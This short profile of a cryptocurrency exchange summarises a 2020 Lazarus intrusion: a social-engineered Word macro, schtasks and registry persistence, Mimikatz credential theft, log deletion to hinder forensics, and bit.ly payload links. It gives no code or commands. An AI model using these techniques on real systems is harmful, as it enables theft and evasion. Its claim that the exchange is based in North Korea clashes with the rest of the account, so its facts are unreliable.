Cryptocurrency exchange

The organisation operates as a cryptocurrency exchange based in North Korea, facilitating the trading of digital assets. Its core services involve enabling transactions and storage of cryptocurrencies, positioning it within the high-risk financial technology sector. The exchange’s operations attract significant attention from cyber threat actors due to the inherent value of managed assets and the potential for financial theft. This targeting is evidenced by its involvement in a sophisticated cyber incident linked to North Korean state-sponsored actors, indicating its role within a strategically compromised supply chain. The absence of publicly disclosed regulatory affiliations or compliance frameworks distinguishes its operational environment from exchanges in more regulated jurisdictions.

A 2020 cyberattack by the Lazarus group exploited the organisation’s infrastructure through a multi-stage intrusion. Attackers impersonated a blockchain company on LinkedIn to deliver a weaponised Microsoft Word document to a system administrator, leveraging social engineering and macro-enabled malware. The payload established persistence via scheduled tasks (schtasks) and registry modifications while deploying custom loaders and credential-harvesting tools like Mimikatz to extract financial data. Operational security measures included deleting security logs to obstruct forensic analysis and using bit.ly-shortened URLs to distribute secondary payloads. The campaign’s objectives centered on compromising cryptocurrency wallets and expanding access to broader sector networks, reflecting the exchange’s vulnerability to supply chain attacks orchestrated by advanced persistent threats.